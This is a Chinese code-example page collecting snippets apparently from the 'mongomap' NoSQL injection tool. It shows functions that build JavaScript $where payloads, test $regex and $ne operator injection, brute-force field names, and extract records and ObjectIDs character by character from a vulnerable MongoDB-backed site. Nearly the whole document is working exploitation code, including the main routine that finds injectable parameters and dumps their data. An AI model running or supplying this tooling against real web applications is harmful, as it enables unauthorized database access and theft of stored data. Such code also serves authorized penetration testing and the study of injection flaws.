示例#1
0
    def vulnTest(self):
        failPayl = "\\"
        data = copy.deepcopy(self.scanner.data)
        data[self.param] = failPayl
        self.scanner.textErrorBaseline = self.scanner.sendData(data).text

        if self.scanner.textErrorBaseline != self.scanner.textBaseline:
            success("Basic check succeeded!")
        else:
            bold("Basic check failed. The rest of this module may not work.")

        for options in self.getAllOptions():
            verbose("Testing with: " + str(options))
            data = copy.deepcopy(self.scanner.data)
            data[self.param] = self.buildPayload(
                options,
                "; if(JSON.stringify(this).startsWith('{')){ return this; }; var dum = "
            )
            req = self.scanner.sendData(data)
            if req.text != self.scanner.textErrorBaseline:
                self.options = options
                success("Error-based content check worked!")
                success("Payload built!")
                return True
        return False
示例#2
0
    def dumpEntryChar(self, var, c):
        try:
            speshul = ["\\", "'", '"']
            oldVar = copy.deepcopy(var)
            oldVarLength = len(var)
            if c in speshul:
                c = "\\" + c
            condition = "".join(var) + c

            payload = self.buildPayload(
                self.options, " || JSON.stringify(this)" + self.slice +
                ".startsWith('" + condition + "') && '' == ")

            data = copy.deepcopy(self.scanner.data)
            data[self.param] = payload
            req = self.scanner.sendData(data)
            check = self.scanner.check(req)
            oldVar.append(c)
            if check != "none":
                if len(var) == oldVarLength:
                    #failure("Added "+c);
                    var.append(c)
                    #print(payload);
                    verbose("".join(var) + "...")
                elif oldVar not in self.toGrabInFuture:
                    self.toGrabInFuture.append(oldVar)
                    verbose("Found alternative, will test later: " +
                            "".join(oldVar))
                    #info(self.fromVarToString(oldVar) + "."*(length-len(oldVar)));
        except Exception as e:
            failure(str(e))
            self.dumpEntryChar(var, c)
示例#3
0
    def dumpIDChar(self, var, c):
        length = 24
        try:
            speshul = self.options["q"] + "\\"
            oldVar = copy.deepcopy(var)
            oldVarLength = len(var)
            condition = "".join(var) + c
            if c in speshul:
                condition = "".join(var) + "\\" + c

            payload = self.buildPayload(
                self.options, " || this._id.str.startsWith(\\\"" + condition +
                "\\\") && '' == '")
            data = copy.deepcopy(self.scanner.data)
            data[self.param] = payload
            req = self.scanner.sendData(data)
            check = self.scanner.check(req)
            oldVar.append(c)
            if check != "none":
                if len(var) == oldVarLength:
                    #failure("Added "+c);
                    var.append(c)

                    verbose("".join(var) + "." * (length - len(var)))
                elif oldVar not in self.toGrabInFuture:
                    self.toGrabInFuture.append(oldVar)
                    verbose("Found alternative, will test later: " +
                            "".join(oldVar))
                    #info(self.fromVarToString(oldVar) + "."*(length-len(oldVar)));
        except Exception as e:
            failure(str(e))
            self.dumpIDChar(var, c)
示例#4
0
 def vulnTest(self):
     data = copy.deepcopy(self.scanner.data);
     self.injectRegex(data,self.param,".");
     #data.pop(self.param);
     #data[self.param+"[$regex]"] = ".";
     req = self.scanner.sendData(data);
     check = self.scanner.check(req);
     if check != "none":
         verbose(check+" has changed!");
         return True;
     return False;
示例#5
0
    def vulnTest(self):
        for data in self.getDataLists():
            verbose("Testing ne combination " + str(data))
            req = self.scanner.sendData(data)
            check = self.scanner.check(req)
            if check != "none":
                verbose(check + " has changed!")
                if data not in self.workingCombinations:
                    self.workingCombinations.append(data)

        if len(self.workingCombinations) > 0:
            return True
        return False
示例#6
0
文件: scanner.py 项目: Hex27/mongomap 
 def testParam(self, p):
     successes = []
     tests = getTests(self.url, p, self)
     self.tests[p] = tests
     for testname in tests:
         test = tests[testname]
         if str(test.getID()) in self.techniques or str(
                 test.getType()) in self.techniques:
             info("Attempting " + testname)
             if test.vulnTest():
                 success(p + " is " + testname + " injectable!")
                 successes.append(testname)
         else:
             verbose("Skipping test " + testname)
     return successes
示例#7
0
    def grabElementAttributes(self):
        if len(self.scanner.element_attributes) > 0:
            if not question(
                    "There were some element attributes previously found. Try finding attributes again?"
            ):
                return
        bold(
            "A bruteforce method is being used to recover columns. This may take a while."
        )

        file = open("txt/common-columns.txt", "r")
        common = file.read().strip().split("\n")
        file.close()

        threads = []
        newAttributes = []
        tried = 0
        for attribute in common:
            tried += 1
            if tried > self.scanner.maxbrute and self.scanner.maxbrute != 0:
                info(
                    "Tested for " + str(self.scanner.maxbrute) +
                    " attributes out of " + str(len(common)) +
                    ". Use the -maxbrute flag to increase the number of tests."
                )
                break
            if len(threads) > self.scanner.maxthreads:
                threads.pop().join()
            verbose("Trying attribute " + attribute)
            thread = threading.Thread(target=self.tryElementAttribute,
                                      args=(attribute, newAttributes))
            threads.append(thread)
            thread.start()

        for thread in threads:
            thread.join()

        for attribute in newAttributes:
            self.scanner.element_attributes.append(attribute)
示例#8
0
    def vulnTest(self):
        failPayl = "\\";
        data = copy.deepcopy(self.scanner.data);
        data[self.param] = failPayl;
        self.scanner.textErrorBaseline = self.scanner.sendData(data).text;

        if self.scanner.textErrorBaseline != self.scanner.textBaseline:
            success("Basic check succeeded!");
        else:
            bold("Basic check failed. The rest of this module may not work.");
        
        for options in self.getAllOptions():
            verbose("Testing with: " + str(options));
            data = copy.deepcopy(self.scanner.data);
            data[self.param] = self.buildPayload(options,"; return this; var dum = ");
            req = self.scanner.sendData(data);
            if req.text != self.scanner.textErrorBaseline:
                self.options = options;
                success("Error-based content check worked!");
                success("Payload built!");
                success(data[self.param]);
                return True;
        return False;
示例#9
0
def main():
    colinit()
    banner()
    #Initiations
    parsed = extractArgs()
    scanner = initScanner(parsed)

    #Test connection to target
    if scanner.testConnection():
        success("URL can be reached.")
    else:
        failure(scanner.url + " cannot be reached. Did you forget http://?")
        sys.exit(1)

    print()

    params = scanner.getParams()

    if "v" in parsed:
        setVerbose(True)

    if "p" in parsed:
        toTest = parsed["p"].split(",")
        for param in toTest:
            if param not in params:
                failure("Param, " + param +
                        " is not provided in your get/post data!")
                sys.exit(1)
        params = toTest

    verbose("Going to test the following parameters:")
    for param in params:
        verbose(param)

    print()

    bold("Beginning testing phase.")
    vulnParams = {}
    tested = 0
    for param in params:
        tested += 1
        bold("Testing for param " + param)
        successes = scanner.testParam(param)
        if len(successes) > 0:
            vulnParams[param] = successes
            success(param + " is injectible.")
            if tested < len(params):
                if not question("Continue testing other parameters?"):
                    break

    print()
    bold("Test phase completed.")

    if len(vulnParams) == 0:
        failure("No vulnerable parameters found.")
        sys.exit(1)

    print()
    success("Vulnerable Parameters:")
    for param in vulnParams:
        success(param)
        for vuln in vulnParams[param]:
            success("- " + vuln)

    print()
    info("Attempting to dump data...")

    for param in vulnParams:
        bold("Parameter: " + param)
        for vuln in vulnParams[param]:
            print()
            bold("Attemping dump with " + vuln + " on param " + param)
            print()
            dump = scanner.dumpData(param, vuln)
            if dump == None:
                print()
                failure(vuln + " for " + param + " failed to dump.")
            else:
                print()
                success(vuln + " for " + param + " has retrieved:")
                if type(dump) == type("str"):
                    success("\t" + dump)
                elif type(dump) == type({}):
                    for key in dump:
                        success("\t" + str(key) + " : " + str(dump[key]))
                elif type(dump) == type([]):
                    for i in dump:
                        success("\t" + str(i))
            print()
示例#10
0
def extractArgs():
    flags = ["dump", "help", "h", "v", "techniques", "ts"]
    options = [
        "u", "t", "method", "data", "p", "cookies", "headers", "maxbrute",
        "maxthreads", "ignorecheck", "csrftoken", "objectids", "file"
    ]

    parsed = {}

    if len(sys.argv) <= 1:
        showHelp()
        sys.exit(1)

    expectingVal = None

    #Parse arguments
    for arg in range(1, len(sys.argv)):
        arg = sys.argv[arg]
        if expectingVal == None:
            if arg.startswith("-"):
                arg = arg.replace("-", "")
                if arg in flags:
                    parsed[arg] = True
                elif arg in options:
                    expectingVal = arg
                else:
                    failure("Unknown option/flag: " + arg)
                    sys.exit(1)
            else:
                failure("Value without option: " + arg)
                sys.exit(1)
        else:
            if arg.startswith("-"):
                failure("Expecting value for option: " + expectingVal)
                sys.exit(1)
            else:
                parsed[expectingVal] = arg
                expectingVal = None

    verbose("Options provided:")
    for key in parsed:
        if key in flags:
            verbose(key + " flag")
        else:
            verbose(key + " - " + parsed[key])

    if "techniques" in parsed or "ts" in parsed:
        showTechniques()
        sys.exit(1)

    if "h" in parsed or "help" in parsed:
        if "t" not in parsed:
            showHelp()
        else:
            techniques = parsed["t"]
            showTechniqueHelp(techniques)
        sys.exit(1)

    if "u" not in parsed:
        failure("You must specify a target with -u!")
        sys.exit(1)

    return parsed